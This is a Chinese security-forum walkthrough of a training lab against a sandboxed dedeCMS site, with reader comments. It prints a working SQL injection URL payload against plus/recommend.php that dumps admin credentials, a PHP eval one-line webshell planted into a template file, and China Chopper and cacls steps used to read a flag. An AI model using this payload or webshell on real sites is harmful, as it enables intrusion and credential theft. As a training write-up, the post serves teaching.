用户
搜索
  • TA的每日心情
    奋斗
    2018-11-14 16:51
  • 签到天数: 317 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    11

    主题

    378

    帖子

    2943

    魔法币
    收听
    29
    粉丝
    138
    注册时间
    2015-10-19

    突出贡献春秋文阁核心白帽i春秋签约作者

    发表于 2017-2-20 18:11:25 39196577
    本帖最后由 独狼1927 于 2017-2-22 15:40 编辑

    image001.png
    Step 0
    实验环境
    操作机:Windows XP [172.16.11.2]
    目标网址:www.test.ichunqiu  [172.16.12.2]
    实验工具:中国菜刀
    实验目标:获取www.test.ichunqiu网站的FLAG信息,学习一些简单的提权方式。
    请访问http://file.ichunqiu.com/49ba59ab下载dedeCMS漏洞利用工具。
    小i提示
    在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果。
    在实验环境中无法连接互联网,请使用您本地的网络环境。

    Step 1
    dedeCMS
    进入实验环境后,注意左侧的实验指导说明,部分实验提供实验文件下载(当前环境中CMS的源码或者漏洞利用工具),对达到实验目的有很大帮助。
    打开浏览器,输入提供的网址,下载dedeCMS漏洞利用工具;
    image002.png

    打开漏洞利用工具,输入URL:
    [Bash shell] 纯文本查看 复制代码
    www.test.ichunqiu
    点击一键爆账号密码;
    image003.png

    用户名:ichunqiu,md5:adab29e084ff095ce3eb,20位md5肯定不是正确的,但可以肯定的是这个值是从32位md5中截取的;尝试从20位中取16位正确md5:b29e084ff095ce3e = md5(only_system,16);
    image004.png

    附加说明:该工具漏洞利用如下
    [Bash shell] 纯文本查看 复制代码
    http://www.test.ichunqiu/plus/recommend.php?action=&aid=1&
    _FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&
    _FILES[type][name]=1.jpg&
    _FILES[type][type]=application/octet-stream&
    _FILES[type][size]=6878


    Step 2
    有了用户名和密码,但是不知道后台地址,如何找后台路径?
    dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。
    dedeCMS目录中的data/mysqli_error_trace.inc文件,是记录数据库出错信息。一般是用于网站存在错误,系统自动记录在该文件中,进一步说,就是该文件是记录sql错误信息的文件,类似于日志功能,关键是它会记录后台路径。
    image005.png

    在浏览器地址栏中输入URL:
    [Bash shell] 纯文本查看 复制代码
    www.test.ichunqiu/lichunqiul
    即可打开后台管理系统登录页面;输入之前获得的用户名和密码[ichunqiu / only_system]可成功登录后台管理系统;
    image006.png

    下一步的工作就是挂马;点击左侧菜单栏中的 [模板]-->[标签源码管理],右侧页面中会出现许多标签文件,挑一个文件点击后面的[编辑];
    注意:1. 记住标签文件的路径/include/taglib     2. 记住你点击编辑的文件名,我在实验中用的是第一个文件adminname.lib.php
    image007.png

    在文件内容中写入一句话木马
    [Bash shell] 纯文本查看 复制代码
    <?php @eval($_POST['ichunqiu']); ?>
    image008.png

    拉到页面最下边,点击[保存]按钮;
    image009.png

    出现该页面说明保存成功,继续下一步,上菜刀;
    image010.png

    Step 3
    打开[中国菜刀] 连接一句话木马;
    工具:中国菜刀   
    路径:C:\Tools\webshell\中国菜刀\chopper.exe
    image011.png

    打开菜刀,右键空白处,选择[添加];
    image012.png

    在地址栏中输入正确的一句话木马所在文件路径:
    [Bash shell] 纯文本查看 复制代码
    http://www.test.ichunqiu/include/taglib/adminname.lib.php
    后面的小框里填入ichunqiu,就是一句话$_POST里的值,这两处保持一致即可,点击 [添加];
    image013.png

    添加完成后,在新增的记录上点击右键,选择 [虚拟终端];
    image014.png

    打开虚拟终端后,显示如下画面,在命令行中输入whoami,结果很感人,SYSTEM权限!
    image015.png

    旗标文件在桌面文件夹中,cd到桌面目录,用type命令查看flag文本文件,结果很不感人,拒绝访问!
    image016.png

    用cacls命令查看访问控制列表,SYSTEM:N,巨大的一枚坑;
    image017.png

    修改SYSTEM访问控制权限:
    [Bash shell] 纯文本查看 复制代码
    cacls flag~ichunqiu.txt /E /P system:F /C
    参数说明:
    /E:编辑访问控制列表而不替换;
    /P user:perm 替换指定用户的访问权限(F是完全控制的意思);
    /C:在出现拒绝访问错误时继续。
    处理成功后,再一次查看文件访问控制权限,SYSTEM已经修改为F:完全控制,用type命令查看flag文件即可得到答案。
    image018.png

    --END--
    ps:部分知识点的内容转自网络;路漫漫其修远兮,感谢小盆友们的帮助@i春秋-花花 @i春秋-小柒
    Dareand the world always yields.





    评分

    参与人数 3积分 +50 魔法币 +63 收起 理由
    遥远的她 + 3 感谢你的分享,i春秋论坛有你更精彩!.
    暂无的家 + 50 + 10 感谢狼头奶爸分享
    zusheng + 50 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    详细的看并且实践了,确实收获不少,但是还是有以下的疑问:
    a.dedeCMS漏洞:mysqli_error_trace.inc文件,网上找的都是mysql_error_trace.inc,少了一个i,看了大神的说明,说是“因为在这个实验环境中使用的mysqli函数集,因此也需要通过mysqli_error_trace.inc来爆破路径。”,那么怎么知道实验使用的是哪个函数集?而且dedeCMS真的默认会有mysqli_error_trace.inc文件吗?
    b.怎么知道flag~ichunqiu.txt是放在桌面上的,难道只能靠猜测,万一不是在桌面上而是在其他目录上岂不是找半天,而且题目也没有提示说旗标文件的名字是flag~ichunqiu.txt,我甚至都不知道旗标以什么文件格式放在哪里。
    希望大神能抽空解答一下心中疑惑。
    使用道具 举报 回复
    huo61072 发表于 2017-8-29 10:17
    狼头,你这20位md5是怎么破解的啊,看到你直接输入only_system反向验证的,可这种几率有点小吧 ...

    你好。从20位中提取16位破解确实有一定的概率,本次试验中是成功了;反向验证的前提是得知道密码,如果我不是通过破解知道密码的,你觉得我是怎么知道only_system的
    使用道具 举报 回复
    独狼1927 发表于 2017-8-29 15:21
    你好。从20位中提取16位破解确实有一定的概率,本次试验中是成功了;反向验证的前提是得知道密码,如果我 ...

    不好意思,我之前不知道拥有二十位或者十六位就可以尝试在网上破解,你们的帖子对我帮助很大很大
    使用道具 举报 回复
    ncbreeze 发表于 2018-4-2 22:11
    详细的看并且实践了,确实收获不少,但是还是有以下的疑问:
    a.dedeCMS漏洞:mysqli_error_trace.inc文件, ...

    关于flag文件的位置,实验的题目中有写,管理员桌面中
    使用道具 举报 回复
    yuanto95 发表于 2017-4-26 19:20
    到了菜刀那一步d点击虚拟终端的时候就报错

    你在step2的最后一步挂完马有没有点击确定,网页会返回一个错误页面,然后进菜刀就不会崩了
    使用道具 举报 回复
    bigbang03 发表于 2017-3-8 21:56
    我有个问题。
    dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。
    如果管理员修改了路径,不是默 ...

    可以通过目录扫描工具来扫路径?
    使用道具 举报 回复
    发表于 2017-11-21 15:50:25
    cike999 发表于 2017-2-22 15:06
    利用的dedecms的什么漏洞拿到的用户名和密码??

    看楼主上面给出的原代码,应该sql注入,用联合查询爆出来的,个人理解说错不要喷
    使用道具 举报 回复
    发表于 2017-11-22 10:43:34
    大宇 发表于 2017-11-21 15:54
    楼主这密文解密到底是怎么做到的,我找了那个网站都解不出来

    你好,如果你解不出来,说明你的密文输入错误,网址是dmd5.com
    使用道具 举报 回复
    发表于 2017-2-21 10:36:52
    真的很简单吗?
    i春秋“培育信息时代的安全感”!
    使用道具 举报 回复
    发表于 2017-2-21 14:25:16

    真的很难!
    使用道具 举报 回复
    狼头又来了,我能照着做,不明白为啥这么做
    使用道具 举报 回复
    发表于 2017-2-22 10:37:00
    暂无的家 发表于 2017-2-22 10:12
    狼头又来了,我能照着做,不明白为啥这么做

      哪里不明白呢?
    使用道具 举报 回复
    发表于 2017-2-22 14:25:53
    真的很简单
    使用道具 举报 回复
    发表于 2017-2-22 15:06:19
    利用的dedecms的什么漏洞拿到的用户名和密码??
    使用道具 举报 回复
    发表于 2017-2-22 15:41:53
    cike999 发表于 2017-2-22 15:06
    利用的dedecms的什么漏洞拿到的用户名和密码??

    攻略中增加了exp,可以去看看
    使用道具 举报 回复

    system权限还有不能做的
    使用道具 举报 回复
    发表于 2017-2-26 22:42:31
    暂无的家 发表于 2017-2-26 17:31
    system权限还有不能做的

    这个真的有~
    使用道具 举报 回复
    发表于 2017-2-27 22:54:33
    谢谢楼主贡献
    使用道具 举报 回复
    发表于 2017-2-28 12:16:36

             
    使用道具 举报 回复
    发表于 2017-3-8 21:56:24
    我有个问题。
    dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。
    如果管理员修改了路径,不是默认路径,这样该如何访问。
    使用道具 举报 回复
    发表于 2017-4-26 19:20:31
    到了菜刀那一步d点击虚拟终端的时候就报错
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册